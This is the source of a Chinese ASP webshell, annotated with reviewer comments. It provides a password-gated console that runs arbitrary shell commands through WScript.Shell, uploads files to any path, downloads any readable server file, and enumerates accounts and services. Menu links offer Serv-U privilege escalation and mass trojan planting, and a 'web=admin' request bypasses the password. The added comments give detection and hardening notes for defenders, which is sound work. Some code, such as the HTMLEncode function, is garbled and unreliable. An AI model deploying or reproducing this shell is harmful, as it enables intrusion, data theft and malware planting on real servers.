' Page head: inline CSS and JavaScript helpers. killErrors hides client-side script errors;
' FullForm fills the hidden form that posts Action and FName back to this script.
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html;
charset=gb2312"">"
RRS"<title>"&mName1&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>function killErrors(){return true;}
window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"",
100);var today = new Date();var display= today.toLocaleString
();window.status=""→"&AD&" --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value =
Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value =
FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全
名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名
称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名
称"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}
if(DName!=null){top.hideform.Action.value =
FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"</script>"
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
' ObT lists the COM ProgIDs this script probes: column 0 is the ProgID, column 2 a description,
' and column 1 receives " √" or " ×" from the loop below. A component counts as missing when
' Server.CreateObject fails with -2147221005 (0x800401F3, invalid class string).
' Defender note: these are the components the script depends on; removing or restricting the ones
' a site does not need reduces what a script of this kind can do on that server.
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件"
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=" √"
Else
IsObj=" ×"
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next
' The current folder is kept in Session("FolderPath"): a FolderPath request value overrides it,
' otherwise it defaults to the script's own directory.
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
Function MainForm()
' Renders the main frame layout: a hidden form (Action, FName) targeted at the FileFrame iframe,
' an address-bar form posting FolderPath, a left menu iframe (?Action=MainMenu) and the file-list
' iframe (?Action=Show1File).
' Session("FolderPath") is written into the input's value attribute without HTML encoding.
' An identical definition of MainForm appears again further down the listing.
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
' A request carrying web=admin gets the session key web2a2dmin set to the configured password,
' although the password itself is not supplied in that request.
' NOTE(review): the login check is not visible in this part. If it compares this session key with
' UserPass, the password is not the only way in; treat web=admin in request logs as an indicator
' and do not assume a single operator when triaging a server where this script was found.
if request("web")="admin" then
Session("web2a2dmin") = UserPass
URL()
end if
Function MainForm()
' Renders the main frame layout: a hidden form (Action, FName) targeted at the FileFrame iframe,
' an address-bar form posting FolderPath, a left menu iframe (?Action=MainMenu) and the file-list
' iframe (?Action=Show1File).
' Session("FolderPath") is written into the input's value attribute without HTML encoding.
' This is the second of two identical MainForm definitions in the listing.
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
' MainMenu: writes the left-hand menu shown in the "Left" iframe.
' - Header link uses SiteURL2 / mName2 and the footer uses Copyright2; none of
'   these is assigned in the visible part of the file (TODO confirm where they are set).
' - If ObT(0,1) equals " ×" the page prints "no permission"; otherwise it lists
'   drives through LBF.ShowDriver and adds fixed shortcuts (web root, script
'   directory, Program Files, All Users folders, a pcAnywhere data folder).
'   ObT is defined outside this view; presumably a table of COM components and
'   their availability -- confirm.
' - The remaining rows are links that select a feature through the Action
'   parameter: Course, getTerminalInfo, ServerInfo, Cmd1Shell, ScanPort, Servu,
'   ReadREG, EditFile, UpFile, kmuma, Cplgm (M=1..3), plgm, Logout, plus a
'   FullForm call with the action name NewFolder.
' Detection: this set of Action values is a useful signature for web-log and
' file-content searches, since the names are specific to this family of pages.
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font
color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>无权限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder
("""&RePath(WWWRoot)&""")'>->站点根目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath
(RootPath)&""")'>→本程序目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program
Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>-
>pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
End If
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→
系统服务-用户账号</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo'
target='FileFrame'>→终端端口-自动登录</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo'
target='FileFrame'>→服务信息-组件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>
→执行CMD命令</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>
→端口扫描器</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→
Serv-u提权</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→
读取注册表</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath
(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录
<hr></a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>
→新建文本</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→
上传文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查
找木马</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>
→高级挂马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>
→批量清马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>
→批量替换</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>
→低级挂马</a></b></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登
录</a></td></tr>"
RRS"<tr><td align=center
style='color:red'><hr>"&Copyright2&"</td></tr></table>"
RRS"</table>"
End Function
' unPack: restores files from a Jet (.mdb) database onto disk.
'   thePath - path of the database file, placed directly into the connection string.
' Opens table "FileData" and, for every row, writes the binary column
' "fileContent" to Server.MapPath(".") & "\" & rs("thePath"), creating missing
' folders through createFolder first. SaveToFile is called with option 2, so
' existing files are overwritten.
' Row paths are used as stored: nothing here rejects ".." segments, so where
' files land depends entirely on the database contents.
' On Error Resume Next hides every failure (missing provider, bad path, denied
' write). fsoX is not defined in this sub -- presumably a file-system object
' created elsewhere in the file (confirm). ws is declared and released but never assigned.
' Defender note: the visible effect is a burst of file creations under the
' script directory by the web worker identity, preceded by an .mdb being opened.
Sub unPack(thePath)
On Error Resume Next
Server.ScriptTimeOut = 5000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & thePath & ";"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
' Type 1 = binary stream.
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs
("thePath"), "\"))
If fsoX.FolderExists(str & theFolder) = False
Then
createFolder(str & theFolder)
End If
' SetEos truncates the stream at the current position before the next write.
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
' createFolder: creates every missing folder along thePath, left to right.
'   thePath - backslash-separated path; each prefix ending at a backslash is visited.
' i holds the position of the current backslash. The existence test uses the
' prefix including that backslash, the creation call uses the prefix without it.
' The loop ends when no further backslash follows position i, so a final
' segment without a trailing backslash is not created here.
' fsoX is defined outside this sub (presumably a file-system object -- confirm).
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If fsoX.FolderExists(Left(thePath, i)) = False
Then
fsoX.CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub
' Course: prints a table of local accounts/groups and services.
' Iterates the children of the ADSI container "WinNT://." (the local machine).
' - Objects whose StartType compares equal to "" are listed as "system user (group)".
' - StartType 2 / 3 / 4 is labelled automatic / manual / disabled in lx.
' - Auto-start entries whose path does not have "win" at characters 4-6 are
'   collected in SI1 with the path in red; every other object goes to SI2 in blue.
' Errors are suppressed for the whole loop (on error resume next, err.clear), so
' property reads that fail on a given object are skipped silently.
' Names and paths are written into the HTML without encoding.
' Defender note: this is account and service enumeration performed by the web
' worker process; running the application pool under a low-privilege identity
' limits what the WinNT provider returns to it.
Function Course()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr>"
SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
SI=SI&obj.Name
SI=SI&"</td><td bgcolor=""#FFFFFF""> "
SI=SI&"系统用户(组)"
SI=SI&"</td></tr>"
SI0="<tr><td height=""20"" bgcolor=""#FFFFFF""
colspan=""2""> </td></tr>"
end if
if OBJ.StartType=2 then lx="自动"
if OBJ.StartType=3 then lx="手动"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#FF0000> "&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399FF> "&obj.path&"</font></td></tr>"
end if
next
RRS SI&SI0&SI1&SI2&"</table>"
End Function
' ServerInfo: prints a host and component inventory table.
' Rows come from Request.ServerVariables (SERVER_NAME, LOCAL_ADDR,
' NUMBER_OF_PROCESSORS, OS, SERVER_SOFTWARE) and the current time, followed by
' one row per entry ObT(0..13, 0..2). ObT is defined outside this view;
' presumably component name / availability / description -- confirm.
' The server IP row is a form that posts the address to
' http://www.ip138.com/index.asp in a new window, i.e. the viewer's browser
' discloses the server address to that third-party site when the button is used.
Function ServerInfo()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
SI=SI&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#FFFFFF'>服务器IP</td><td
bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
SI=SI&"<input type='text' name='ip' size='15'
value='"&Request.ServerVariables("LOCAL_ADDR")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&now&" </td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器CPU数量</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")
&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器操作系统</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>WEB服务器版本</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")
&"</td></tr>"
For i=0 To 13
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)
&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
Next
RRS SI
End Function
' DownFile: sends the file at Path to the client as an attachment.
'   Path - full server-side path; used as given, with no restriction to the web root.
' The file is loaded into a binary stream created from ObT(6,0) (defined outside
' this view; used here with Open/Type/LoadFromFile like an ADODB.Stream -- confirm)
' and written with Response.BinaryWrite. The attachment name is the text after
' the last backslash of Path.
' The whole file is read into memory before being sent.
' Defender note: any file readable by the web worker identity can leave the
' server this way; responses of type application/octet-stream from an .asp page
' that normally serves HTML are worth alerting on.
Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Mid(path,sz)
Response.AddHeader "Content-Length", OSM.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function
' HTMLEncode: meant to escape S for HTML output; leaves the return value unset
' (Empty) when S is Null.
' NOTE(review): as printed in this listing, each Replace has identical search and
' replacement text, so S comes back unchanged, and the CHR(34) line ends in an
' unterminated string literal. Presumably the replacement strings were HTML
' entities that got decoded when the page was rendered -- confirm against a raw copy.
' CHR(20) is the DC4 control character, not a space (a space is CHR(32)).
' S is reassigned inside the function; VBScript passes arguments by reference by
' default, so a variable passed in is modified for the caller as well.
Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), " ")
HTMLEncode = S
end if
End Function
' UpFile: upload form and its handler.
' With Action2=Post: the multipart body is parsed by class UPC, the part named
' "LocalFile" is saved to the path given in form field "ToPath", a result
' message is written, and the response ends. The target path is used as
' supplied: no extension filter and no restriction to a directory.
' Without Action2=Post: writes the upload form, pre-filling ToPath with
' Session("FolderPath") & "\diy3.asp".
' UName is echoed into the success message without HTML encoding.
' Defender notes: multipart POSTs carrying Action=UpFile&Action2=Post, and new
' script files (.asp/.asa/.cer/.cdx) created by the web worker identity, are the
' traces to look for. Removing that identity's write permission on web content
' folders stops the save step.
Function UpFile()
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
SI="<br>请输入上传的完全路径后选择一个文件上传!"
Else
F.SaveAs UName
If Err.number=0 Then
SI="<center><br><br><br>文件"&UName&"上传成功!</center>"
End if
End If
Set F=nothing:Set U=nothing
SI=SI&BackUrl
RRS SI
ShowErr()
Response.End
End If
SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
SI=SI&"<form name='UpForm' method='post' action='"&URL&"?
Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
SI=SI&"<tr><td>"
SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session
("FolderPath")&"\diy3.asp")&"' size='40'>"
SI=SI&" <input name='LocalFile' type='file' size='25'>"
SI=SI&" <input type='submit' name='Submit' value='上传'>"
SI=SI&"</td></tr></form></table>"
RRS SI
End Function
' Cmd1Shell: command form and its handler; output is shown in a textarea.
' Inputs (all from the request):
'   SP      - interpreter path, remembered in Session("ShellPath"); default "diy3.asp".
'   cmd     - command text, appended after ShellPath & " /c ".
'   wscript - "yes" selects the Exec branch, anything else the Run branch.
' Exec branch: object from ObT(1,0) (defined outside this view; used like
' WScript.Shell -- confirm); stdout is read in full and appended without HTML encoding.
' Run branch: WScript.Shell.Run with output redirected to cmd.txt in the script
' directory; the file is read, passed through Server.HTMLEncode, then deleted.
' Defender notes: the observable traces are the web worker process starting
' child processes, a short-lived cmd.txt in the web directory, and POST fields
' named cmd / SP / wscript. Restricting WScript.Shell for the web application
' identity and removing its write access to web content folders limits this routine.
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "diy3.asp"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"'
Style='width:70%'> "
SI=SI&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input
type='submit' value='执行'><textarea Style='width:100%;height:440;'
class='cmd'>"
' Execution happens only for a posted form field, not for a query-string cmd.
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
' Login gate, evaluated at top level before the Action dispatch.
' A request is treated as logged in when Session("web2a2dmin") equals UserPass.
' Otherwise:
'   - a posted form field "pass" equal to UserPass sets the session key and
'     redirects to the page's own URL; a wrong value prints a banner;
'   - with no "pass" posted, the login form is built in si and written only
'     when instr(SI,SIC) is non-zero. SIC and SiteURL are not assigned in the
'     visible part of the file -- TODO confirm what they contain.
' response.end stops all further processing for requests that are not logged in.
' The comparison is a plain string match against a value hard-coded in the file;
' there is no attempt counter or delay.
' Detection: POSTs with a single field named "pass" to an .asp file, answered by
' a redirect to the same URL, match this gate.
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>HACK by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"&Copyright&"</center>"
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if
Dim T1
' UPC: parser for multipart/form-data request bodies.
'   D1 - dictionary of plain form fields (lower-cased name -> text value).
'   D2 - dictionary of file parts (lower-cased name -> FIF object).
' The raw body is kept in the global stream T1 so that FIF.SaveAs can copy the
' file bytes out of it later.
' ObT(4,0) and ObT(6,0) are defined outside this view; they are used here like a
' Scripting.Dictionary and an ADODB.Stream respectively -- confirm.
Class UPC
Dim D1,D2
' Returns the text of form field F, or "" when the field was not sent.
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
' Returns the FIF object for file field F, or a new empty FIF when absent.
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
End Function
' Reads and parses the request body when the object is created.
' The whole body is read in one call (Request.TotalBytes); no size limit is applied.
' The first line of the body is taken as the part boundary (TSt). For each part
' the header block is decoded as gb2312 and the name="..." value extracted; a
' part with filename="..." is recorded by offset and size in D2, any other part
' is decoded as text into D1 (repeated names are joined with ", ").
' The filename and Content-Type positions are located but not stored.
Private Sub Class_Initialize
Dim
TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject(ObT(4,0))
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject(ObT(4,0))
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
TLen = LenB (TSt)
DStart=DStart+TLen+1
while (DStart + 10) < DEnd
DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
T2.Type = 1 : T2.Mode =3 : T2.Open
T1.Position = DStart
T1.CopyTo T2,DIEnd-DStart
T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
TIn = T2.ReadText : T2.Close
DStart = InStrB(DIEnd,TDa,TSt)
FStart = InStr(22,TIn,"name=""",1)+6
FEnd = InStr(FStart,TIn,"""",1)
UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
if InStr (45,TIn,"filename=""",1) > 0 then
set TFL=new FIF
FStart = InStr(FEnd,TIn,"filename=""",1)+10
FEnd = InStr(FStart,TIn,"""",1)
FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
FEnd = InStr(FStart,TIn,vbCr)
TFL.FileStart =DIEnd
TFL.FileSize = DStart -DIEnd -3
if not D2.Exists(UpName) then
D2.add UpName,TFL
end if
else
T2.Type =1 : T2.Mode =3 : T2.Open
T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
T2.Position = 0 : T2.Type = 2
T2.Charset ="gb2312"
SFV = T2.ReadText
T2.Close
if D1.Exists(UpName) then
D1(UpName)=D1(UpName)&", "&SFV
else
D1.Add UpName,SFV
end if
end if
DStart=DStart+TLen+1
wend
TDa=""
set T2 =nothing
End Sub
' Releases the dictionaries and the shared body stream, but only when the
' request had a body (mirrors the early exit in Class_Initialize).
Private Sub Class_Terminate
if Request.TotalBytes>0 then
D1.RemoveAll:D2.RemoveAll
set D1=nothing:set D2=nothing
T1.Close:set T1 =nothing
end if
End Sub
End Class
' FIF: describes one uploaded file part inside the shared body stream T1.
'   FileSize  - number of bytes of the part (0 when no file was sent).
'   FileStart - offset of the first file byte in T1 (0 when no file was sent).
Class FIF
dim FileSize,FileStart
Private Sub Class_Initialize
FileSize = 0
FileStart= 0
End Sub
' SaveAs: copies FileSize bytes from T1, starting at FileStart, to the file F.
'   F - destination path, used as given; SaveToFile option 2 overwrites an existing file.
' Return value: True when nothing was written (empty F or FileStart = 0),
' False after the write -- i.e. True signals "skipped", not "success".
' T1 is the global stream filled by UPC.Class_Initialize; it must still be open.
Public function SaveAs(F)
dim T3
SaveAs=true
if trim(F)="" or FileStart=0 then exit function
set T3=CreateObject(ObT(6,0))
T3.Mode=3 : T3.Type=1 : T3.Open
T1.position=FileStart
T1.copyto T3,FileSize
T3.SaveToFile F,2
T3.Close
set T3=nothing
SaveAs=false
end function
End Class
' LBF: file-manager operations behind the console's FileFrame.
'   CF - object created from ObT(0,0) (defined outside this view); it is used
'        with Drives, GetFolder, FileExists, CopyFile etc., i.e. like a
'        Scripting.FileSystemObject -- confirm.
' Every method takes its path from the caller unchanged: nothing in this class
' restricts operations to the web root, so the effective limit is the NTFS
' permission set of the web worker identity.
' File and folder names are written into HTML and javascript: links without
' encoding.
' Defender notes: file creation, deletion, moves and edits under web content
' folders performed by the worker process are the traces of this class; the
' POST field FName with action names such as DelFile, EditFile, CopyFolder
' appears in the request bodies.
Class LBF
Dim CF
Private Sub Class_Initialize
SET CF=CreateObject(ObT(0,0))
End Sub
Private Sub Class_Terminate
Set CF=Nothing
End Sub
' ShowDriver: writes one ShowFolder link per drive letter reported by CF.Drives.
Function ShowDriver()
For Each D in CF.Drives
RRS" <a href='javascript:ShowFolder
